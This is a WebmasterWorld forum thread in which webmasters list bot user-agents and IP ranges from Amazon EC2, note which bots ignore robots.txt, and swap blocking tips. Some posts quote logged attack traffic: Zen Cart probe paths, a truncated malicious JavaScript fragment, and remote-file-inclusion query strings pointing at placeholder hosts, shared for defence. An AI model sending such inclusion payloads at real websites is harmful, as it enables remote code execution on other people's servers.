Welcome to WebmasterWorld Guest from 54.160.131.144

Forum Moderators: Ocean10000 & incrediBILL

Message Too Old, No Replies

amazonaws.com plays host to wide variety of bad bots

Most recently seen: Gnomit

     

Pfui

3:04 am on Jan 18, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-67-202-57-30.compute-1.amazonaws.com
Mozilla/5.0 (compatible; X11; U; Linux i686 (x86_64); en-US; +http://gnomit.com/) Gecko/2008092416 Gnomit/1.0"

- robots.txt? NO
- Uneven apostrophes in UA (only closing)
- site in UA yields this oh-so-descriptive info:

<html>
<head>
</head>
<body>
</body>
</html>

----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you; or newly renamed. Here are the actual UA strings; in no particular order:

NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO

feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO

Twitturly / v0.5
robots.txt? NO

YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO

YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes

Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO

PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES

EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES

Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO

TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO

Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO

Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES

yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO

Mozilla/5.0
robots.txt? NO

Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES

TinEye
robots.txt? NO

Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES

nnn/ttt (n)
robots.txt? YES

AideRSS/1.0 (aiderss.com)
robots.txt? NO

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO

----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO

WebClient
robots.txt? YES

----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:

Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.

Pfui

7:31 pm on Nov 17, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Many, many AWS-based UAs still hitting home and specific pages. robots.txt? NEVER.

DAILY (multiple times; always HEAD requests):

ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2

ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)

WEEKLY (approx.; always HEAD requests):

ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

(Two days earlier, Netcraft sent its minion...)

lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

dstiles

10:20 pm on Nov 17, 2009 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



I just dumped the whole 174.129.nnn.nnn block into IIS's Security Deny list - won't ever see it again even in the logs. A /24 of a persistent 75.101 block followed it in and is likely to be extended any day now...

Pfui

11:38 pm on Nov 17, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



One more for your files, dstiles:)

I forgot to mention this many, many, many times a day pest. No robots.txt, 'natch. GETs, not HEADs:

ec2-67-202-15-174.compute-1.amazonaws.com
Python-urllib/2.6

dstiles

12:06 am on Nov 18, 2009 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Only got one hit near that this month (176, not 174) but lots more in the 67.202.nnn.nnn range. Their days may be numbered but I'm interested in seeing what else comes along. :)

I already have all known (to me) AWS blocks blocked with hits logged, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)

Bewenched

6:40 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Yup .. had to just block ALL
174.129.x.x

MASSIVE amounts of form submits like 600 in less than one minute.

Pfui

8:01 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Amazon's Elastic Compute Cloud (EC2)/AWS hosting gets bigger and biggger and bigggger:

174.129.0.0 - 174.129.255.255
174.129.0.0/16

@Bewenched: Yikes. Were you attacked by a single IP/amazonaws.com Host? If yes, which one, please? Also, was there one particular UA? TIA

Pfui

10:51 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-174-129-75-209.compute-1.amazonaws.com
SheenBot/SheenBot-1.0.0 (Sheen web crawler)

robots.txt? Yes

Pfui

11:00 pm on Nov 19, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Two UAs crawling Tweeted URLs:

ec2-174-129-62-166.compute-1.amazonaws.com
Typhoeus - http://github.com/pauldix/typhoeus/tree/master

robots.txt? NO

ec2-75-101-227-191.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.1

robots.txt? NO

keyplyr

9:11 am on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



ec2-174-129-225-12.compute-1.amazonaws.com
UA: Who.is Bot
robots.txt: no

hit / and ran

tangor

9:46 am on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



I'm this close to Deny 174.129* that I have to ask (and I ask because this topic thrills me but I have little to zero ambition to learn it fully) are there ANY legit visitors from this domain? So far I've seen none. I lean toward whitelisting (less work) than expending oodles of time in pissant deny because the latter is SO much more work!

Pfui

10:09 pm on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



I block by Host (amazonaws) and I've yet to see a single real-person-in-real-time hit from AWS since before I began this thread on Jan. 17, 2009. Rapid-fire assaults increase every week, like this 90-second blitz from a few days ago (partial listing):

[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)

That range, that place, gives irresponsible bot-runners a place to hide and breed.

keyplyr

11:21 pm on Nov 21, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



What range does Amazon's A9 search engine crawl from?

Pfui

8:39 am on Nov 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Good Q. Beats me. Never spotted an A9 hit -- anyone? Then again, it appears A9 is primarily product-oriented now and none of my sites sell stuff. Rather, the majority of my hits from AWS are social network-related.

Pfui

5:23 pm on Nov 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Alas, even Amazon EC2 (Amazon Elastic Compute Cloud) isn't free of exploit-probers:

ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola

11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/

Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."

Pfui

4:57 am on Nov 24, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Yikes. Another exploit this evening:

ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too?;)

---
P.S./FYI

The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):

icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/

87.218.210-nn.q9.net
Java/1.6.0_14

crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)

Who's crawling/exploiting whom?

keyplyr

8:59 am on Nov 24, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

There's a lot of that coming from various hosts.

Pfui

10:01 am on Dec 1, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-67-202-41-144.compute-1.amazonaws.com
cierzo/Nutch-0.9

robots.txt? Yes

Pfui

10:33 pm on Dec 3, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-75-101-232-27.compute-1.amazonaws.com
MetaURI API +metauri.com

robots.txt? NO

Pfui

1:09 am on Dec 4, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-75-101-158-138.compute-1.amazonaws.com
my6sense/1.0

robots.txt? NO

Pfui

2:49 am on Dec 7, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Emphasis mine. Running from amazonaws, this is a bot. But it's also a FF add-on, which means, if it alters all FF strings, it'll be iffy distinguishing potential hits from less obvious/notorious server farms.

ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)

robots.txt? NO

dstiles

8:10 pm on Dec 9, 2009 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Just to add another reason to block the cloud:

"Zeus crimeware using Amazon's EC2 as command and control server"
(from zdnet security blog)

A few days ago I noted in another thread that I'd seen an AWS IP in the midst of botnet accesses.

keyplyr

2:00 am on Dec 21, 2009 (gmt 0)

WebmasterWorld Senior Member keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



...an AWS IP in the midst of botnet accesses.

In the "midst?" Ha, I looked up "botnet" and expected to see a thumbnail of Amazon EC2:

174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"

Pfui

5:36 pm on Dec 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



ec2-174-129-64-134.compute-1.amazonaws.com
Mozilla/5.0 (compatible; XmarksFetch/1.0; +http://www.xmarks.com/about/crawler; info@xmarks.com)

robots.txt? Yes

Pfui

6:14 pm on Dec 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Speaking of AWS/EC and botnet-related exploits... Three seconds apart:

.
Mozilla/5.0
22:36:04///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

Notes:

- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.

- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").

- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --

IP.compute-1(or2,etc).amazonaws.com

-- but this is:

IP.us-west-1.compute.amazonaws.com

There are more variations here [robtex.com]. (I block on amazonaws.com)

Pfui

8:24 pm on Dec 22, 2009 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Whoa. Another one. Wonder when AWS/EC2 is going to clean up its act?

ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?

Note: .su is the Soviet Union.

(FWIW, I won't keep posting exploit events because this thread's for spider-sitings and the fake UA has been reported.)

dstiles

3:46 pm on Jan 1, 2010 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Just found a new (to me) Amazon IP block. Cloud but not labelled AWS.

IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.

Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2

Pfui

4:59 pm on Jan 1, 2010 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



Good spotting, dstiles! Shoot. Cloaked servers now, too -- and w/ a UA related to China via .cn and 163.com, hosts with long histories of nastiness on my sites. In a word: Ugh.

FWIW, here's yet another UA:

ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

robots.txt? NO

dstiles

11:12 pm on Jan 1, 2010 (gmt 0)

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member



Already got the whole range 174.129.0.0 - 174.129.255.255 blocked! :)

Pfui

10:05 am on Jan 12, 2010 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



No UA at all this time, and only went for favicon.ico:

ec2-75-101-169-108.compute-1.amazonaws.com
-

robots.txt? NO

tangor

10:50 am on Jan 12, 2010 (gmt 0)

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



Pfui...

This has been a very interesting thread... what say you parse it to significance and reduce to the fully skinny? For the kiddies out there yet to ask the query?

More fun: provide ip ranges ala amazonaws.com

This 278 message thread spans 10 pages: 278